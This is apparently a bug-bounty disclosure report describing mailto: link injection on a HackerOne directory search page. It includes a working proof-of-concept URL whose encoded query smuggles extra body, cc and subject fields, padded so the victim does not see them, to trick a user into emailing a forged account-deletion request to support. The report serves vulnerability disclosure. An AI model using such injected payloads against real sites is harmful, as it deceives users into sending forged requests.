mailto: link injection on https://hackerone.com/directory

I just found that entering a non-existing porogram returns the following response: >The Directory doesn't have a profile matching these criteria. >If an organization has published security contact information or a vulnerability disclosure policy, **please let us know.** The bold part has a mailto: link which is in following format: `mailto:[email protected]?subject=Directory:<PROGRAM>` Now i tried the following URL which did my Spoofing Job. [POC Link](https://hackerone.com/directory?query=Test%20program_____________________________________________________________________________________________%26body%3DPleaase%20delete%20my%20account%20ASAP%26cc%3Dsupport%40hackerone.com%26subject%3D%2CRequest%20to%20delete%20my%20account%26body%3D%20----------------------------%20The%20following%20line%20has%20not%20to%20be%20edited%20or%20your%20Haackerone%20account%20will%20be%20closed----------------------------------------%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Its%20a%20request%20Please%20delete%20my%20account%20ASAP%20without%20confirmation!%20&sort=published_at%3Adescending&page=1) 1. The user doesn't see the whole search term , so he thinks he is Helping hackerone add a new program. 2. Now he sends email (hackeone thretens not to change anything in email. 3. Unexpected action happens like Payemnt method chnage etc.